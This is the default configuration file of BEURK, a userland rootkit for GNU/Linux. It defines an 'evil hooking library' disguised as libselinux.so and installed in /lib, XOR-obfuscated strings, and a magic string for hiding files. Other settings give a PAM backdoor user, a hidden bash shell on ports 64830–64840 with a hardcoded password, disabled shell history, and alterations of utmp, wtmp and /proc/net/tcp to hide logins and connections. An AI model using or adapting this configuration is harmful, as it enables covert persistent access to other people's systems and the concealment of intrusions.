beurk.conf

# BEURK is an userland rootkit for GNU/Linux, focused around stealth.
# -> Default Configuration File
#
# vi: ft=conf

# str: name of the generated evil hooking library
LIBRARY_NAME = libselinux.so

# str: where to store infected, only work in `production` mode
INFECT_DIR = /lib

# hexbyte: the XOR key to use for obfuscated strings
XOR_KEY = 0xfe

# int: set DEBUG_LEVEL to 1 or 2 (0 to disable)
DEBUG_LEVEL = 0

# str: set debug file destination
DEBUG_FILE = /dev/stderr

# str: hide files with this string in the name
MAGIC_STRING = _BEURK_

# str: PAM username (for su / ssh login)
PAM_USER = beurkroot

# int: lowest port to connect to from backdoor
LOW_BACKDOOR_PORT = 64830
# int: highest port to connect to from backdoor
HIGH_BACKDOOR_PORT = 64840

# str: password to connect
SHELL_PASSWORD = b3urkR0cks

# str: welcome message on backdoor connection
SHELL_MOTD = Welcome to BEURK's hidden shell ...

# str: remote shell to use for backdoor connection
SHELL_TYPE = /bin/bash

# str: name of the environment variable used to identify our shell
HIDDEN_ENV_VAR = BEURK_ATTACKER

# str: predefined env `key=val` strings to set on shell dropping
_ENV_IS_ATTACKER =  BEURK_ATTACKER=true
_ENV_NO_HISTFILE =  HISTFILE=/dev/null
_ENV_XTERM =        TERM=xterm

# str: utmp file
_UTMP_FILE = /var/run/utmp
# str: wtmp file
_WTMP_FILE = /var/log/wtmp

# str: file to alter for hidding tcp/ipv4
PROC_NET_TCP = /proc/net/tcp

# str: file to alter for hidding tcp/ipv6
PROC_NET_TCP6 = /proc/net/tcp6

# str: path to processes
PROC_PATH = /proc/

# str: scanf fmt string, DO NOT TOUCH
SCANF_PROC_NET_TCP = %d: %64[0-9A-Fa-f]:%X %64[0-9A-Fa-f]:%X %X %lX:%lX %X:%lX %lX %d %d %lu %512s\n

# str: format string for proc/env
ENV_LINE = %s/environ

# int: maximal length of our strings
MAX_LEN = 4125